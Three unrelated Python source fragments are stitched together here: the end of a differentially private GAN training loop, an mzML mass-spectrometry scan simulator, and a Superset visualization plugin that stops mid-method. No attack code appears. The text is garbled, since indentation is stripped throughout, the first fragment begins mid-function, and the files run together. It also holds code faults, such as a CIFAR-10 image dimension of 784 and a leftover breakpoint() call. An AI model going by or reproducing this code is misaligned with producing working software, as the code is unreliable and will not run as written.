elif dataset == 'fashionmnist':
dataloader = datasets.FashionMNIST
trainset = dataloader(root=os.path.join(DATA_ROOT, 'FashionMNIST'), train=True, download=True,
transform=transform_train)
elif dataset == 'cifar_100':
dataloader = datasets.CIFAR100
trainset = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR100'), train=True, download=True,
transform=transform_train)
IMG_DIM = 3072
NUM_CLASSES = 100
elif dataset == 'cifar_10':
IMG_DIM = 784
NUM_CLASSES = 10
dataloader = datasets.CIFAR10
trainset = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR10'), train=True, download=True,
transform=transform_train)
else:
raise NotImplementedError
	print('create indices file')
indices_full = np.arange(len(trainset))
np.random.shuffle(indices_full)
#indices_full.dump(os.path.join(save_dir, 'indices.npy'))
trainset_size = int(len(trainset) / num_discriminators)
print('Size of the dataset: ', trainset_size)
mini_loader, micro_loader = pyvacy.sampling.get_data_loaders(batchsize, 1, args.iterations)
input_pipelines = []
for i in range(num_discriminators):
'''
start = i * trainset_size
end = (i + 1) * trainset_size
indices = indices_full[start:end]
trainloader = DataLoader(trainset, batch_size=args.batchsize, drop_last=False,
num_workers=args.num_workers, sampler=SubsetRandomSampler(indices))
#input_data = inf_train_gen(trainloader)
input_pipelines.append(trainloader)
'''
start = i * trainset_size
end = (i + 1) * trainset_size
indices = indices_full[start:end]
trainset_1 = torch.utils.data.Subset(trainset, indices)
trainloader = mini_loader(trainset_1)
input_pipelines.append(trainloader)
### not add noise by hook which is middle between G/D
'''
if if_dp:
### Register hook
global dynamic_hook_function
for netD in netD_list:
netD.conv1.register_backward_hook(master_hook_adder)
'''
prg_bar = tqdm(range(args.iterations+1))
for iters in prg_bar:
#########################
### Update D network
#########################
netD_id = np.random.randint(num_discriminators, size=1)[0]
device = devices[get_device_id(netD_id, num_discriminators, num_gpus)]
netD = netD_list[netD_id]
optimizerD = optimizerD_list[netD_id]
input_data = input_pipelines[netD_id]
for p in netD.parameters():
p.requires_grad = True
'''
### Register hook for add noise to D
if if_dp:
for parameter in netD.parameters():
if parameter.requires_grad:
parameter.register_hook(
lambda grad: grad + (1 / batchsize) * noise_multiplier * torch.randn(grad.shape) * SENSITIVITY
#lambda grad: grad
)
'''
optimizerD.zero_grad()
x_mini, y_mini = next(iter(input_data))
for real_data, real_y in micro_loader(TensorDataset(x_mini, y_mini)):
real_data = real_data.view(-1, IMG_DIM)
real_data = real_data.to(device)
real_y = real_y.to(device)
real_data_v = autograd.Variable(real_data)
### train with real
dynamic_hook_function = dummy_hook
netD.zero_grad()
D_real_score = netD(real_data_v, real_y)
D_real = -D_real_score.mean()
### train with fake
batchsize = real_data.shape[0]
if latent_type == 'normal':
noise = torch.randn(batchsize, z_dim).to(device0)
elif latent_type == 'bernoulli':
noise = bernoulli.sample((batchsize, z_dim)).view(batchsize, z_dim).to(device0)
else:
raise NotImplementedError
noisev = autograd.Variable(noise)
fake = autograd.Variable(netG(noisev, real_y.to(device0)).data)
inputv = fake.to(device)
D_fake = netD(inputv, real_y.to(device))
D_fake = D_fake.mean()
'''
### train with gradient penalty
gradient_penalty = netD.calc_gradient_penalty(real_data_v.data, fake.data, real_y, L_gp, device)
D_cost = D_fake + D_real + gradient_penalty
### train with epsilon penalty
logit_cost = L_epsilon * torch.pow(D_real_score, 2).mean()
D_cost += logit_cost
'''
### update
optimizerD.zero_microbatch_grad()
D_cost = D_fake + D_real
D_cost.backward()
#import ipdb;ipdb.set_trace()
optimizerD.microbatch_step()
Wasserstein_D = -D_real - D_fake
optimizerD.step()
del real_data, real_y, fake, noise, inputv, D_real, D_fake#, logit_cost, gradient_penalty
torch.cuda.empty_cache()
############################
# Update G network
###########################
if if_dp:
### Sanitize the gradients passed to the Generator
dynamic_hook_function = dp_conv_hook
else:
### Only modify the gradient norm, without adding noise
dynamic_hook_function = modify_gradnorm_conv_hook
for p in netD.parameters():
p.requires_grad = False
netG.zero_grad()
### train with sanitized discriminator output
if latent_type == 'normal':
noise = torch.randn(batchsize, z_dim).to(device0)
elif latent_type == 'bernoulli':
noise = bernoulli.sample((batchsize, z_dim)).view(batchsize, z_dim).to(device0)
else:
raise NotImplementedError
label = torch.randint(0, NUM_CLASSES, [batchsize]).to(device0)
noisev = autograd.Variable(noise)
fake = netG(noisev, label)
#summary(netG, input_data=[noisev,label])
fake = fake.to(device)
label = label.to(device)
G = netD(fake, label)
G = - G.mean()
### update
optimizerG.zero_grad()
G.backward()
G_cost = G
optimizerG.step()
### update the exponential moving average
exp_mov_avg(netGS, netG, alpha=0.999, global_step=iters)
############################
### Results visualization
############################
prg_bar.set_description('iter:{}, G_cost:{:.2f}, D_cost:{:.2f}, Wasserstein:{:.2f}'.format(iters, G_cost.cpu().data,
D_cost.cpu().data,
Wasserstein_D.cpu().data
))
if iters % args.vis_step == 0:
if dataset == 'mnist':
generate_image_mnist(iters, netGS, fix_noise, save_dir, device0)
elif dataset == 'cifar_100':
generate_image_cifar100(iters, netGS, fix_noise, save_dir, device0)
elif dataset == 'cifar_10':
generate_image_mnist(iters, netGS, fix_noise, save_dir, device0)
if iters % args.save_step == 0:
### save model
torch.save(netGS.state_dict(), os.path.join(save_dir, 'netGS_%d.pth' % iters))
del label, fake, noisev, noise, G, G_cost, D_cost
torch.cuda.empty_cache()
if ((iters+1) % 500 == 0):
classify_training(netGS, dataset, iters+1)
### save model
torch.save(netG, os.path.join(save_dir, 'netG.pth'))
torch.save(netGS, os.path.join(save_dir, 'netGS.pth'))
if __name__ == '__main__':
args = parse_arguments()
save_config(args)
main(args)
|
"""Main module."""
import io
import pathlib
import time
import warnings
from pprint import pformat
from typing import Callable, Dict, List, Tuple, Union
from collections import Counter
import numpy as np
import pyqms
import scipy as sci
from intervaltree import IntervalTree
from loguru import logger
from psims.mzml import MzMLWriter
from tqdm import tqdm
import smiter
from smiter.fragmentation_functions import AbstractFragmentor
from smiter.lib import (
calc_mz,
check_mzml_params,
check_peak_properties,
peak_properties_to_csv,
)
from smiter.noise_functions import AbstractNoiseInjector
from smiter.peak_distribution import distributions
warnings.filterwarnings("ignore")
class Scan(dict):
"""Summary."""
def __init__(self, data: dict = None):
"""Summary.
Args:
dict (TYPE): Description
"""
if data is not None:
self.update(data)
@property
def mz(self):
"""Summary."""
v = self.get("mz", None)
return v
@mz.setter
def mz(self, mz):
"""Summary."""
self["mz"] = mz
@property
def i(self):
"""Summary."""
v = self.get("i", None)
return v
@i.setter
def i(self, i):
"""Summary."""
self["i"] = i
@property
def id(self):
"""Summary."""
v = self.get("id", None)
return v
@property
def precursor_mz(self):
"""Summary."""
v = self.get("precursor_mz", None)
return v
@property
def precursor_i(self):
"""Summary."""
v = self.get("precursor_i", None)
return v
@property
def precursor_charge(self):
"""Summary."""
v = self.get("precursor_charge", None)
return v
# @property
# def precursor_scan_id(self):
# """Summary."""
# v = self.get("precursor_scan_id", None)
# return v
@property
def retention_time(self):
"""Summary."""
v = self.get("rt", None)
return v
@property
def ms_level(self):
"""Summary.
Returns:
TYPE: Description
"""
v = self.get("ms_level", None)
return v
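# Hedged example (added): Scan is a thin dict wrapper, so values set through the mapping
# interface surface through the read-only properties above, e.g.
#   Scan({"mz": np.array([100.0]), "i": np.array([1e4]), "rt": 12.5, "ms_level": 1}).retention_time -> 12.5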
def generate_interval_tree(peak_properties):
"""Conctruct an interval tree containing the elution windows of the analytes.
Args:
peak_properties (dict): Description
Returns:
IntervalTree: Description
"""
tree = IntervalTree()
for key, data in peak_properties.items():
start = data["scan_start_time"]
end = start + data["peak_width"]
tree[start:end] = key
return tree
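# Hedged sketch (added for illustration, not used by the module): querying the elution-window
# tree built above. The molecule names and times are made up; only the two keys that
# generate_interval_tree reads ("scan_start_time", "peak_width") are required.
def _interval_tree_demo():
    props = {
        "molecule_A": {"scan_start_time": 10.0, "peak_width": 30.0},
        "molecule_B": {"scan_start_time": 25.0, "peak_width": 20.0},
    }
    tree = generate_interval_tree(props)
    return {interval.data for interval in tree.at(30.0)}  # -> {"molecule_A", "molecule_B"}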
# @profile
def write_mzml(
file: Union[str, io.TextIOWrapper],
peak_properties: Dict[str, dict],
fragmentor: AbstractFragmentor,
noise_injector: AbstractNoiseInjector,
mzml_params: Dict[str, Union[int, float, str]],
) -> str:
"""Write mzML file with chromatographic peaks and fragment spectra for the given molecules.
Args:
file (Union[str, io.TextIOWrapper]): Description
molecules (List[str]): Description
fragmentation_function (Callable[[str], List[Tuple[float, float]]], optional): Description
peak_properties (Dict[str, dict], optional): Description
"""
# check params and raise Exception(s) if necessary
logger.info("Start generating mzML")
mzml_params = check_mzml_params(mzml_params)
peak_properties = check_peak_properties(peak_properties)
interval_tree = generate_interval_tree(peak_properties)
filename = file if isinstance(file, str) else file.name
scans = []
trivial_names = {}
charges = set()
for key, val in peak_properties.items():
trivial_names[val["chemical_formula"]] = key
charges.add(val["charge"])
# trivial_names = {
# val["chemical_formula"]: key for key, val in peak_properties.items()
# }
# dicts are sorted, language specification since python 3.7+
isotopologue_lib = generate_molecule_isotopologue_lib(
peak_properties, trivial_names=trivial_names, charges=charges
)
scans, scan_dict = generate_scans(
isotopologue_lib,
peak_properties,
interval_tree,
fragmentor,
noise_injector,
mzml_params,
)
logger.info("Delete interval tree")
del interval_tree
write_scans(file, scans)
if not isinstance(file, str):
file_path = file.name
else:
file_path = file
path = pathlib.Path(file_path)
summary_path = path.parent.resolve() / "molecule_summary.csv"
peak_properties_to_csv(peak_properties, summary_path)
return filename
# @profile
def rescale_intensity(
i: float, rt: float, molecule: str, peak_properties: dict, isotopologue_lib: dict
):
"""Rescale intensity value for a given molecule according to scale factor and distribution function.
Args:
i (TYPE): Description
rt (TYPE): Description
molecule (TYPE): Description
peak_properties (TYPE): Description
isotopologue_lib (TYPE): Description
Returns:
TYPE: Description
"""
scale_func = peak_properties[f"{molecule}"]["peak_function"]
rt_max = (
peak_properties[f"{molecule}"]["scan_start_time"]
+ peak_properties[f"{molecule}"]["peak_width"]
)
if scale_func == "gauss":
mu = (
peak_properties[f"{molecule}"]["scan_start_time"]
+ 0.5 * peak_properties[f"{molecule}"]["peak_width"]
)
dist_scale_factor = distributions[scale_func](
rt,
mu=mu,
sigma=peak_properties[f"{molecule}"]["peak_params"].get(
"sigma", peak_properties[f"{molecule}"]["peak_width"] / 10
),
)
elif scale_func == "gamma":
dist_scale_factor = distributions[scale_func](
rt,
a=peak_properties[f"{molecule}"]["peak_params"]["a"],
scale=peak_properties[f"{molecule}"]["peak_params"]["scale"],
)
elif scale_func == "gauss_tail":
mu = (
peak_properties[f"{molecule}"]["scan_start_time"]
+ 0.3 * peak_properties[f"{molecule}"]["peak_width"]
)
dist_scale_factor = distributions[scale_func](
rt,
mu=mu,
sigma=0.12 * (rt - peak_properties[f"{molecule}"]["scan_start_time"]) + 2,
scan_start_time=peak_properties[f"{molecule}"]["scan_start_time"],
)
elif scale_func is None:
dist_scale_factor = 1
# TODO use ionization_effiency here
i *= (
dist_scale_factor
* peak_properties[f"{molecule}"].get("peak_scaling_factor", 1e3)
* peak_properties[f"{molecule}"].get("ionization_effiency", 1)
)
return i
def generate_scans(
isotopologue_lib: dict,
peak_properties: dict,
interval_tree: IntervalTree,
fragmentor: AbstractFragmentor,
noise_injector: AbstractNoiseInjector,
mzml_params: dict,
):
"""Summary.
Args:
isotopologue_lib (TYPE): Description
peak_properties (TYPE): Description
fragmentation_function (A): Description
mzml_params (TYPE): Description
"""
logger.info("Initialize chimeric spectra counter")
chimeric_count = 0
chimeric = Counter()
logger.info("Start generating scans")
t0 = time.time()
gradient_length = mzml_params["gradient_length"]
ms_rt_diff = mzml_params.get("ms_rt_diff", 0.03)
t: float = 0
mol_scan_dict: Dict[str, Dict[str, list]] = {}
scans: List[Tuple[Scan, List[Scan]]] = []
# i: int = 0
spec_id: int = 1
de_tracker: Dict[str, int] = {}
de_stats: dict = {}
mol_scan_dict = {
mol: {"ms1_scans": [], "ms2_scans": []} for mol in isotopologue_lib
}
molecules = list(isotopologue_lib.keys())
progress_bar = tqdm(
total=gradient_length,
desc="Generating scans",
bar_format="{desc}: {percentage:3.0f}%|{bar}| {n:.2f}/{total_fmt} [{elapsed}<{remaining}",
)
while t < gradient_length:
scan_peaks: List[Tuple[float, float]] = []
scan_peaks = {}
mol_i = []
mol_monoisotopic = {}
candidates = interval_tree.at(t)
# print(len(candidates))
for mol in candidates:
# if len(candidates) > 1:
mol = mol.data
mol_plus = f"{mol}"
mz = np.array(isotopologue_lib[mol]["mz"])
intensity = np.array(isotopologue_lib[mol]["i"])
intensity = rescale_intensity(
intensity, t, mol, peak_properties, isotopologue_lib
)
mask = intensity > mzml_params["min_intensity"]
intensity = intensity[mask]
# clip max intensity
intensity = np.clip(
intensity, a_min=None, a_max=mzml_params.get("max_intensity", 1e10)
)
mz = mz[mask]
mol_peaks = list(zip(mz, intensity))
mol_peaks = {round(mz, 6): _i for mz, _i in list(zip(mz, intensity))}
            # !FIXED! molecules that share an m/z have their intensities summed up for that shared m/z
if len(mol_peaks) > 0:
mol_i.append((mol, mz[0], sum(intensity)))
# scan_peaks.extend(mol_peaks)
for mz, intensity in mol_peaks.items():
if mz in scan_peaks:
scan_peaks[mz] += intensity
else:
scan_peaks[mz] = intensity
mol_scan_dict[mol]["ms1_scans"].append(spec_id)
highest_peak = max(mol_peaks.items(), key=lambda x: x[1])
mol_monoisotopic[mol] = {
"mz": highest_peak[0],
"i": highest_peak[1],
}
scan_peaks = sorted(list(scan_peaks.items()), key=lambda x: x[1])
if len(scan_peaks) > 0:
mz, inten = zip(*scan_peaks)
else:
mz, inten = [], []
s = Scan(
{
"mz": np.array(mz),
"i": np.array(inten),
"id": spec_id,
"rt": t,
"ms_level": 1,
}
)
prec_scan_id = spec_id
spec_id += 1
sorting = s.mz.argsort()
s.mz = s.mz[sorting]
s.i = s.i[sorting]
# add noise
s = noise_injector.inject_noise(s)
# i += 1
scans.append((s, []))
t += ms_rt_diff
progress_bar.update(ms_rt_diff)
if t > gradient_length:
break
fragment_spec_index = 0
max_ms2_spectra = mzml_params.get("max_ms2_spectra", 10)
if len(mol_i) < max_ms2_spectra:
max_ms2_spectra = len(mol_i)
ms2_scan = None
mol_i = sorted(mol_i, key=lambda x: x[2], reverse=True)
logger.debug(f"All molecules eluting: {len(mol_i)}")
logger.debug(f"currently # fragment spectra {len(scans[-1][1])}")
mol_i = [
mol
for mol in mol_i
if (de_tracker.get(mol[0], None) is None)
or (t - de_tracker[mol[0]]) > mzml_params["dynamic_exclusion"]
]
logger.debug(f"All molecules eluting after DE filtering: {len(mol_i)}")
while len(scans[-1][1]) != max_ms2_spectra:
logger.debug(f"Frag spec index {fragment_spec_index}")
if fragment_spec_index > len(mol_i) - 1:
# we evaluated fragmentation for every potential mol
# and all will be skipped
logger.debug(f"All possible mol are skipped due to DE")
break
mol = mol_i[fragment_spec_index][0]
_mz = mol_i[fragment_spec_index][1]
_intensity = mol_i[fragment_spec_index][2]
fragment_spec_index += 1
mol_plus = f"{mol}"
all_mols_in_mz_and_rt_window = [
mol.data
for mol in candidates
if (
abs(isotopologue_lib[mol.data]["mz"][0] - _mz)
< mzml_params["isolation_window_width"]
)
]
if len(all_mols_in_mz_and_rt_window) > 1:
chimeric_count += 1
chimeric[len(all_mols_in_mz_and_rt_window)] += 1
if mol is None:
                # don't add empty MS2 scans; keep just as many scans as precursors
breakpoint()
ms2_scan = Scan(
{
"mz": np.array([]),
"i": np.array([]),
"rt": t,
"id": spec_id,
"precursor_mz": 0,
"precursor_i": 0,
"precursor_charge": 1,
"precursor_scan_id": prec_scan_id,
"ms_level": 2,
}
)
spec_id += 1
t += ms_rt_diff
progress_bar.update(ms_rt_diff)
if t > gradient_length:
break
elif (peak_properties[mol_plus]["scan_start_time"] <= t) and (
(
peak_properties[mol_plus]["scan_start_time"]
+ peak_properties[mol_plus]["peak_width"]
)
>= t
):
# fragment all molecules in isolation and rt window
# check if molecule needs to be fragmented according to dynamic_exclusion rule
if (
de_tracker.get(mol, None) is None
or (t - de_tracker[mol]) > mzml_params["dynamic_exclusion"]
):
logger.debug("Generate Fragment spec")
de_tracker[mol] = t
if mol not in de_stats:
de_stats[mol] = {"frag_events": 0, "frag_spec_ids": []}
de_stats[mol]["frag_events"] += 1
de_stats[mol]["frag_spec_ids"].append(spec_id)
peaks = fragmentor.fragment(all_mols_in_mz_and_rt_window)
frag_mz = peaks[:, 0]
frag_i = peaks[:, 1]
ms2_scan = Scan(
{
"mz": frag_mz,
"i": frag_i,
"rt": t,
"id": spec_id,
"precursor_mz": mol_monoisotopic[mol]["mz"],
"precursor_i": mol_monoisotopic[mol]["i"],
"precursor_charge": peak_properties[mol]["charge"],
"precursor_scan_id": prec_scan_id,
"ms_level": 2,
}
)
spec_id += 1
ms2_scan.i = rescale_intensity(
ms2_scan.i, t, mol, peak_properties, isotopologue_lib
)
ms2_scan = noise_injector.inject_noise(ms2_scan)
ms2_scan.i *= 0.5
else:
logger.debug(f"Skip {mol} due to dynamic exclusion")
continue
t += ms_rt_diff
progress_bar.update(ms_rt_diff)
if t > gradient_length:
break
else:
logger.debug(f"Skip {mol} since not in RT window")
continue
if mol is not None:
mol_scan_dict[mol]["ms2_scans"].append(spec_id)
if ms2_scan is None:
# there are molecules in mol_i
# however all molecules are excluded from fragmentation_function
# => Don't do a scan and break the while loop
# => We should rather continue and try to fragment the next mol!
logger.debug(f"Continue and fragment next mol since MS2 scan is None")
continue
if (
len(ms2_scan.mz) > -1
): # TODO -1 to also add empty ms2 specs; 0 breaks tests currently ....
sorting = ms2_scan.mz.argsort()
ms2_scan.mz = ms2_scan.mz[sorting]
ms2_scan.i = ms2_scan.i[sorting]
logger.debug(f"Append MS2 scan with {mol}")
scans[-1][1].append(ms2_scan)
progress_bar.close()
t1 = time.time()
logger.info("Finished generating scans")
logger.info(f"Generating scans took {t1-t0:.2f} seconds")
logger.info(f"Found {chimeric_count} chimeric scans")
return scans, mol_scan_dict
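# Hedged sketch (not part of the original module): the dynamic-exclusion rule applied in the
# MS2 loop above, factored into a standalone helper. A molecule is eligible for fragmentation
# only if it was never fragmented before, or if more than `exclusion_window` time units have
# passed since its last fragmentation. The helper name is illustrative.
def _dynamic_exclusion_allows(de_tracker, mol, t, exclusion_window):
    """Return True if `mol` may be fragmented at time `t` under dynamic exclusion."""
    last_fragmented = de_tracker.get(mol, None)
    return last_fragmented is None or (t - last_fragmented) > exclusion_window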
# @profile
def generate_molecule_isotopologue_lib(
peak_properties: Dict[str, dict],
charges: List[int] = None,
trivial_names: Dict[str, str] = None,
):
"""Summary.
Args:
molecules (TYPE): Description
"""
logger.info("Generate Isotopolgue Library")
start = time.time()
duplicate_formulas: Dict[str, List[str]] = {}
for key in peak_properties:
duplicate_formulas.setdefault(
peak_properties[key]["chemical_formula"], []
).append(key)
if charges is None:
charges = [1]
if len(peak_properties) > 0:
molecules = [d["chemical_formula"] for d in peak_properties.values()]
lib = pyqms.IsotopologueLibrary(
molecules=molecules,
charges=charges,
verbose=False,
trivial_names=trivial_names,
)
reduced_lib = {}
# TODO fix to support multiple charge states
for mol in molecules:
formula = lib.lookup["molecule to formula"][mol]
data = lib[formula]["env"][(("N", "0.000"),)]
for triv in lib.lookup["formula to trivial name"][formula]:
reduced_lib[triv] = {
"mz": data[peak_properties[triv]["charge"]]["mz"],
"i": data["relabun"],
}
else:
reduced_lib = {}
tmp = {}
for mol in reduced_lib:
cc = peak_properties[mol]["chemical_formula"]
for triv in duplicate_formulas[cc]:
if triv not in reduced_lib:
tmp[triv] = reduced_lib[mol]
reduced_lib.update(tmp)
logger.info(
f"Generating IsotopologueLibrary took {(time.time() - start)/60} minutes"
)
return reduced_lib
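# Hedged usage sketch (illustrative only, not part of the original module): the molecule name,
# chemical formula and charge below are made up, and the formula string must follow whatever
# notation pyqms.IsotopologueLibrary accepts.
def _example_isotopologue_lib_usage():
    example_peak_properties = {
        "example_mol": {"chemical_formula": "C(6)H(12)O(6)", "charge": 1},
    }
    lib = generate_molecule_isotopologue_lib(
        peak_properties=example_peak_properties,
        charges=[1],
        trivial_names={"C(6)H(12)O(6)": "example_mol"},
    )
    # each entry maps a trivial name to its isotope pattern ("mz" and "i" arrays)
    return lib["example_mol"]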
# @profile
def write_scans(
file: Union[str, io.TextIOWrapper], scans: List[Tuple[Scan, List[Scan]]]
) -> None:
"""Generate given scans to mzML file.
Args:
file (Union[str, io.TextIOWrapper]): Description
scans (List[Tuple[Scan, List[Scan]]]): Description
Returns:
None: Description
"""
t0 = time.time()
logger.info("Start writing Scans")
ms1_scans = len(scans)
ms2_scans = 0
ms2_scan_list = []
for s in scans:
ms2_scans += len(s[1])
ms2_scan_list.append(len(s[1]))
logger.info("Write {0} MS1 and {1} MS2 scans".format(ms1_scans, ms2_scans))
id_format_str = "controllerType=0 controllerNumber=1 scan={i}"
with MzMLWriter(file) as writer:
# Add default controlled vocabularies
writer.controlled_vocabularies()
writer.format()
# Open the run and spectrum list sections
time_array = []
intensity_array = []
with writer.run(id="Simulated Run"):
spectrum_count = len(scans) + sum([len(products) for _, products in scans])
with writer.spectrum_list(count=spectrum_count):
for scan, products in scans:
# Write Precursor scan
try:
index_of_max_i = np.argmax(scan.i)
max_i = scan.i[index_of_max_i]
mz_at_max_i = scan.mz[index_of_max_i]
except ValueError:
mz_at_max_i = 0
max_i = 0
spec_tic = sum(scan.i)
writer.write_spectrum(
scan.mz,
scan.i,
id=id_format_str.format(i=scan.id),
params=[
"MS1 Spectrum",
{"ms level": 1},
{
"scan start time": scan.retention_time,
"unit_name": "seconds",
},
{"total ion current": spec_tic},
{"base peak m/z": mz_at_max_i, "unitName": "m/z"},
{
"base peak intensity": max_i,
"unitName": "number of detector counts",
},
],
)
time_array.append(scan.retention_time)
intensity_array.append(spec_tic)
# Write MSn scans
for prod in products:
writer.write_spectrum(
prod.mz,
prod.i,
id=id_format_str.format(i=prod.id),
params=[
"MSn Spectrum",
{"ms level": 2},
{
"scan start time": prod.retention_time,
"unit_name": "seconds",
},
{"total ion current": sum(prod.i)},
],
precursor_information={
"mz": prod.precursor_mz,
"intensity": prod.precursor_i,
"charge": prod.precursor_charge,
"scan_id": id_format_str.format(i=scan.id),
"spectrum_reference": id_format_str.format(i=scan.id),
"activation": ["HCD", {"collision energy": 25.0}],
},
)
with writer.chromatogram_list(count=1):
writer.write_chromatogram(
time_array,
intensity_array,
id="TIC",
chromatogram_type="total ion current",
)
t1 = time.time()
logger.info(f"Writing mzML took {(t1-t0)/60:.2f} minutes")
return
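# Hedged usage sketch (illustrative only): write a single tiny MS1 scan with no MS2 products.
# It assumes the Scan helper defined earlier in this module accepts the keys used below and
# that a plain file path is a valid `file` argument; the values are made up.
def _example_write_scans():
    toy_scan = Scan(
        {
            "mz": np.array([100.0, 200.0]),
            "i": np.array([1e4, 5e3]),
            "rt": 0.0,
            "id": 1,
            "ms_level": 1,
        }
    )
    write_scans("toy.mzML", [(toy_scan, [])])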
|
"""This module contains the "Viz" internal simpleflow plugin objects
These plugin objects represent the backend of all the visualizations that
Superset can render for simpleflow
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import copy
import hashlib
import logging
import traceback
import uuid
import zlib
from collections import OrderedDict, defaultdict
from datetime import datetime, timedelta
import pandas as pd
import numpy as np
from flask import request
from flask_babel import lazy_gettext as _
from markdown import markdown
import simplejson as json
from six import string_types, PY3
from dateutil import relativedelta as rdelta
from superset import app, utils, cache
from superset.utils import DTTM_ALIAS
## BaseViz is an abstract class
##from superset.viz_base import Viz, viz_types_list
from superset.viz import Viz
##
from superset.graph import (
BaseGraph
)
config = app.config
stats_logger = config.get('STATS_LOGGER')
### TODO: use a naming convention, such as prefixing all simpleflow control names with 'sf_'
#mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code", "year_group": "year"}'
mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"location_id"}'
form_data_db_mask = json.loads(mask_json)
class SimpleFlowViz(Viz):
"""All simpleflow visualizations derive this base class"""
viz_type = None
verbose_name = "Base Viz"
credits = ""
is_timeseries = False
def __init__(self, datasource, form_data):
if not datasource:
raise Exception("Viz is missing a datasource")
self.datasource = datasource
self.request = request
self.viz_type = form_data.get("viz_type")
self.form_data = form_data
print("from viz_base.py self.viz_type")
#print(self.viz_type)
self.query = ""
self.token = self.form_data.get(
'token', 'token_' + uuid.uuid4().hex[:8])
self.metrics = self.form_data.get('metrics') or []
self.groupby = self.form_data.get('groupby') or []
self.status = None
self.error_message = None
self.baseGraph = BaseGraph()
def get_df(self, query_obj=None):
"""Returns a pandas dataframe based on the query object"""
if not query_obj:
query_obj = self.query_obj()
##print('BaseViz')
#print('baseviz return query_obj', query_obj)
self.error_msg = ""
self.results = None
timestamp_format = None
if self.datasource.type == 'table':
dttm_col = self.datasource.get_col(query_obj['granularity'])
if dttm_col:
timestamp_format = dttm_col.python_date_format
# The datasource here can be different backend but the interface is common
self.results = self.datasource.query(query_obj)
print('plugins/internal/simpleflow.py get_df self.results, self.results.df', self.results, self.results.df )
self.query = self.results.query
self.status = self.results.status
self.error_message = self.results.error_message
df = self.results.df
# Transform the timestamp we received from database to pandas supported
# datetime format. If no python_date_format is specified, the pattern will
# be considered as the default ISO date format
# If the datetime format is unix, the parse will use the corresponding
# parsing logic.
if df is None or df.empty:
self.status = utils.QueryStatus.FAILED
if not self.error_message:
self.error_message = "No data."
return pd.DataFrame()
else:
if DTTM_ALIAS in df.columns:
if timestamp_format in ("epoch_s", "epoch_ms"):
df[DTTM_ALIAS] = pd.to_datetime(df[DTTM_ALIAS], utc=False)
else:
df[DTTM_ALIAS] = pd.to_datetime(
df[DTTM_ALIAS], utc=False, format=timestamp_format)
if self.datasource.offset:
df[DTTM_ALIAS] += timedelta(hours=self.datasource.offset)
            df = df.replace([np.inf, -np.inf], np.nan)
df = df.fillna(0)
return df
def get_extra_filters(self):
extra_filters = self.form_data.get('extra_filters', [])
return {f['col']: f['val'] for f in extra_filters}
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
        # __from and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
# extras are used to query elements specific to a datasource type
# for instance the extra where clause that applies only to Tables
extras = {
'where': form_data.get("where", ''),
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
print("baseViz extras")
##print(extras)
#print("query_obj baseViz form_data", form_data);
#where_filter_str = ""
### built the filter for dashboard, since slice is now integrated with dashboard
#dashboard_filter_array = []
#try:
## mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code"}'
## form_data_db_mask = json.loads(mask_json)
# where_filter_array = []
# for attr, value in form_data.items():
# if (form_data_db_mask.get(str(attr), None) is not None) and (value is not None) and value and len(value) > 0 :
# where_filter = form_data_db_mask.get(str(attr)) + " in ( " + ",".join(value) + ")"
# where_filter_array.append(where_filter)
# ## build the dashboard_filter_array
# dashboard_filter_array += [{
# 'col': form_data_db_mask.get(str(attr)),
# 'op': 'in',
# 'val': value,
# }]
# if len(where_filter_array) > 0 :
# where_filter_str = " and ".join(where_filter_array)
# ## sample format: age_group_id in ( 1,2,22) and model_id in ( 46,4,7,10,,108,28,38,94,106) and sex_id in ( 3)
# print("viz.py baseViz simpleflow_line where_filter_str, dashboard_filter_array", where_filter_str, dashboard_filter_array)
#
#except Exception as e:
# logging.exception(e)
# print("form_data fields in viz.py is not iterable");
filters = form_data['filters'] if 'filters' in form_data \
else []
for col, vals in self.get_extra_filters().items():
print("viz.py baseViz looping extra_filters col, vals, self.datasource.filterable_column_names", col, vals, self.datasource.filterable_column_names)
if not (col and vals) or col.startswith('__'):
continue
elif col in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': col,
'op': 'in',
'val': vals,
}]
elif form_data_db_mask.get(col) in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': form_data_db_mask.get(col),
'op': 'in',
'val': map(int, vals),
}]
##filters.extend(dashboard_filter_array)
#print('viz.py baseViz query_obj filters', filters, form_data['filters'])
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
##print(d)
return d
@property
def cache_timeout(self):
if self.form_data.get('cache_timeout'):
return int(self.form_data.get('cache_timeout'))
if self.datasource.cache_timeout:
return self.datasource.cache_timeout
if (
hasattr(self.datasource, 'database') and
self.datasource.database.cache_timeout):
